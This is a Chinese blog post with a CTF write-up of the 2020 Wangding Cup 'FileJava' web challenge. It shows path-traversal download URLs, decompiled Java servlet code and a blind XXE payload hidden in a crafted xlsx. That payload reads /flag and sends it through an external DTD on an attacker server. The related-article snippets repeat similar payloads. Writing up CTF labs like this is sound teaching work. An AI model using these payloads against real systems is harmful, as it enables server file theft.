2020网鼎杯(青龙组)--WEB--FileJava(XXE)

最新推荐文章于 2024-07-27 13:59:36 发布
最新推荐文章于 2024-07-27 13:59:36 发布
阅读量2k 收藏 5
点赞数 2
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a965527596/article/details/106177477/
版权

FileJava

1.打开题目,只有上传和下载的功能,可以上传任意文件和下载文件,但是不能访问,所以不能用一句话连接,在下载文件功能发现可以下载任意文件,于是将WEB-INF/web.xml页面下载下来,发现有上传和下载的配置文件,由2个类组成,将这2个类下载下来。

<?xml version="1.0" encoding="UTF-8"?>

-<web-app version="4.0" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://xmlns.jcp.org/xml/ns/javaee">


-<servlet>

<servlet-name>DownloadServlet</servlet-name>

<servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>

</servlet>


-<servlet-mapping>

<servlet-name>DownloadServlet</servlet-name>

<url-pattern>/DownloadServlet</url-pattern>

</servlet-mapping>


-<servlet>

<servlet-name>ListFileServlet</servlet-name>

<servlet-class>cn.abc.servlet.ListFileServlet</servlet-class>

</servlet>


-<servlet-mapping>

<servlet-name>ListFileServlet</servlet-name>

<url-pattern>/ListFileServlet</url-pattern>

</servlet-mapping>


-<servlet>

<servlet-name>UploadServlet</servlet-name>

<servlet-class>cn.abc.servlet.UploadServlet</servlet-class>

</servlet>


-<servlet-mapping>

<servlet-name>UploadServlet</servlet-name>

<url-pattern>/UploadServlet</url-pattern>

</servlet-mapping>

</web-app>
首页
http://challenge-f6c012eb074739ac.sandbox.ctfhub.com:10080/file_in_java/DownloadServlet?filename=../../../../WEB-INF/web.xml

下载文件类文件
http://challenge-f6c012eb074739ac.sandbox.ctfhub.com:10080/file_in_java/DownloadServlet?filename=../../../../WEB-INF/classes/cn/abc/servlet/DownloadServlet.class

上传文件类文件
http://challenge-f6c012eb074739ac.sandbox.ctfhub.com:10080/file_in_java/DownloadServlet?filename=../../../../WEB-INF/classes/cn/abc/servlet/UploadServlet.class

2.分析上传类和下载类

将文件下载下来后进行反编译,发现downloadservlet限制了flag 的下载,uploadservlet里面当文件头为excel-并且结尾为xlsx时会对该文件进行操作,可能存在XXE。

if (fileName != null && fileName.toLowerCase().contains ("flag")){
	request.setAttribute ("message","禁止读取");
	request.getRequestDispatcher("/message.jsp").forward((ServletRequest));
	return;
}
if (filename.startsWith("excel-") && "xlsx".equals(fileExtName)) {
    try {
        Workbook wb1 = WorkbookFactory.create(in);
        Sheet sheet = wb1.getSheetAt(0);
        System.out.println(sheet.getFirstRowNum());
    } catch (InvalidFormatException var20) {
        System.err.println("poi-ooxml-3.10 has something wrong");
        var20.printStackTrace();
    }
}

3.先新建一个excel-1.xlsx文件,再改后缀为zip,解压缩,对文件夹里面的[Content_Types].xml进行修改,修改完后再压缩成zip,改后缀为xlsx。

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % remote SYSTEM "http://服务器ip/1.dtd">
%remote;
%all;
]>
<root>&send;</root>

然后在自己的服务器上面新建一个1.dtd,内容为:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://服务器ip:监听端口/%file;'>">

接着监听自己的服务器的9999端口,然后上传文件。

上传成功后,端口就会收到flag。

说白道黑
关注
专栏目录
[网鼎杯 2020 青龙 wp ]filejava
mutou990的博客
08-13 694
知识点 web.xml文件泄露 blind xxe 用到的工具: burpsuit或者hackbar都可以 审题 1打开题目如下 2随便上传一个文件,然后点击下载,抓包 看到有filename,猜测可能存在目录穿越以及任意文件下载 3尝试通过报错来获取网站的绝对路径,设置URL参数filename=../ 4爆出了绝对路径,路径里面有WEB-INF,题目提示与java有关,那应该是web.xml文件泄露,尝试读取,修改filename参数如下(…/数量随意写几个): filename=../../..
网鼎杯2020青龙-web
ChenZIDu的博客
05-18 950
看来反序列化要多打点了,反序列化这块都不怎么熟~ AreUSerialz 源码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "
[网鼎杯 2020 青龙] filejava
charai的博客
05-08 173
进去发现就是一个单纯的文件上传接口,试试功能,发现上传后的文件名会给出,还有一个下载连接,点开下载链接发现是这种格式的 http://7b576de9-dd31-4f71-b86d-0a8d5b6ff15f.node4.buuoj.cn:81/DownloadServlet?filename=e5ac31d0-6273-46bb-9863-d5f6d9105523_pwdTop500.txt 可以看见就是对于传入的参数进行下载,这里试试任意文件下载,了解javaweb的目录是 webapps/WE
[网鼎杯 2020 朱雀]Nmap(详细解读版)
最新发布
weixin_73399382的博客
07-27 1008
这道题考察nmap的一些用法,以及escapeshellarg和escapeshellcmd两个函数的绕过,可以看这里两种解题方法:第一种通过nmap的-iL参数读取扫描一个文件到指定文件中第二种是利用nmap的参数写入webshell-oN 标准保存-oX XML保存-oG保存-oA 保存到所有格式。
[网鼎杯 2020 青龙]filejava
qq_54929891的博客
07-03 1731
看见java我就有点后怕,因为我怎么不懂java,当作一个学习过程吧进去后就看见是一个上传题目,随便传一个文件进行抓包发现有一个filename参数,立刻联想到是不是有路径穿越问题,加上之前做过几个java题都是web-inf泄露 先试试../看看我们现在在哪 数了一下有九个,于是我就../九个然后去看配置文件总共有三个文件,我们需要去class里面给他们下下来,记住要带后缀,而且.是代表/,我记得我第一次做的时候直接用的.导致出不来 下下来的文件拖到IDEA进行观察,发现没有java基础果然看不怎
2020网鼎杯青龙-filejava
box
08-25 319
网鼎杯 2020 青龙filejava 0x00 访问连接发现是个文件上传表单 尝试上传一个文件 发现上传之后可以下载 发现这个 url格式和常见的文件下载类似,可能存在下载漏洞。 尝试目录穿越下载 WEB-INF/web.xml文件,发现穿越四级目录即可 0x02 下载关键class文件 在web.xml配置文件中发现几个class文件 cn.abc.servlet.DownloadServlet 在网站目录对应 classes/cn.abc/servlet/DownloadServlet.cl
2020网鼎杯---Java文件上传wp
Summer's blog
05-14 8093
前言 一篇文章读懂Java代码审计之XXE看过我这篇博客应该不难,没看过建议在看看。 题解 新建xxe.xlsx文件,修改后缀名xxe.zip解压。 修改[Content-Types].xml <!DOCTYPE ANY [ <!ENTITY % file SYSTEM "file:///flag"> <!ENTITY % remote SYSTEM "http://ip:8089/evil.dtd"> %remote; %all; ]> <root&
第85天:CTF夺旗-JAVA考点反编译&XXE&反序列化1
08-03
例如,网鼎杯2020年的题目中就涉及到利用XXE漏洞来读取服务器上的文件,进一步找到Flag。 总结来说,理解并掌握Java反编译、XXE攻击、反序列化漏洞以及文件安全是提升网络安全技能的重要一环,对于CTF选手和开发...
HIN2xxE系列RS-232收发器的原理及应用
12-13
摘要:HIN2xxE系列是由+5V单电源供电的高速RS-232收发电路,符合EIA RS-232C和V.28规范,以电源功耗低为显著特点,广泛应用于ISDN和高速调制解调器,尤其是电池供电系统中。文中主要介绍HIN2xxE系列电路的原理、特性...
2020网鼎杯青龙赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
2020网鼎杯青龙Boom
05-12
2020网鼎杯青龙Boom。如果需要的可以下载,其实就是解方程而已,没啥难度。
2020网鼎杯青龙白虎部分试题.rar
05-14
2020网鼎杯青龙白虎部分试题 ,包括密码、杂项、逆向、PWN。希望可以帮助到大家复习。此次青龙难度大于白虎。
[CTF]网鼎杯2020-青龙-Web-FileJava-WriteUp
胖胖的ALEX
05-14 4432
一、赛题截图 二、做题思路 (1)查看源码,唯一有点用信息:./UploadServlet. (2)虽然题目名称和查看源码./UploadServlet都告诉这是一个JAVA程序,但建议还是访问/robots.txt,碰碰运气。 (3)随便上传一个dog.png图片,用Burpsuite抓包,发现新的URL地址:/DownloadServlet?filename=a6c672c9-a74c-4701-abfc-97d68e3c681d_dog.png (4)Burpsuite拦截下载文件请求URL,
网鼎杯2020青龙——filejava通关思路
m0_61506558的博客
12-28 1333
1、启模式的解析器对象, DocumentBuilderFactory 是一个抽象工厂类,它不能直接实例化,但该类提供了newInstance()方法,这个方法会根据本地平台默认安装的解析器,自动创建一个工厂的对象并返回。驱动程序所必需的接口,其允许应用程序设置和查询解析器中的功能和属性、注册文档处理的事件处理程序,以及开始文档解析。在dnslog平台申请一个域名,点击上传会有数据外带,说明该程序存在漏洞,我们接下来就是要判断是有回显还是没有回显。因为使用了同一个接口,所以这两种方式的调用方法是完全一致的。
2020网鼎杯青龙)--WEB--AreUSerialz(反序列化)
a965527596的博客
05-17 2345
AreUSerialz 1.题目直接给出源码,分析源码发现是反序列漏洞,读代码发现通过get传入参数str,然后会利用is_valid()函数进行检测是否合法,函数限制只能出现ascii值在32-125之间的字符,而protected类型序列化出现的%00标识被url解码后ascii值为0,会被检测到,但是因为php7.1+对类属性的检测不严格,所以可以直接用public来进行序列化。 <?php include("flag.php"); highlight_file(__FILE__);
网鼎杯2020 青龙 -web
weixin_43610673的博客
05-16 1063
AreUSerialz <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $co
泛微oa e-cology xxe 漏洞
08-17
泛微OA是一种常见的企业办公自动化系统,而XXE(XML外部实体注入)漏洞是指攻击者通过注入恶意的外部实体来读取或利用系统中的敏感数据。 泛微OA的XXE漏洞是由于系统对外部XML实体的处理不当所导致的。攻击者可以通过构造恶意的XML实体并将其发送给系统,然后利用系统对外部实体的解析不当来读取系统中的文件,包括敏感的配置文件、数据库信息。攻击者还可以通过XXE漏洞发起钓鱼攻击或者是向系统发送恶意的请求来进一步导致系统的安全漏洞。 为了防范泛微OA的XXE漏洞,建议以下几点: 1. 进行安全审计:对泛微OA系统进行定期的安全审计,通过检测系统中的漏洞和弱点,及时修复存在的XXE漏洞。 2. 模板限制:在处理外部XML实体时,应限制或阻止对外部实体的解析,避免可能的XXE攻击。可以通过设置合适的解析选项,限制对外部实体的访问权限。 3. 输入验证与过滤:对于用户输入的数据,应进行合理的验证和过滤,确保输入的内容符合预期格式,避免恶意的外部实体注入。 4. 更新补丁:定期保持泛微OA系统的更新与升级,及时安装官方发布的补丁和修复漏洞的版本。 5. 安全意识培训:加强企业员工的安全意识培训,提高他们对XXE漏洞及其他安全威胁的认识,避免因无意中点击恶意链接或下载恶意附件而导致漏洞的利用。 通过以上措施,可以有效地减少泛微OA中的XXE漏洞,提升系统的安全性。及早识别并修复漏洞,有助于保护企业的机密信息以及防止潜在的安全威胁发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值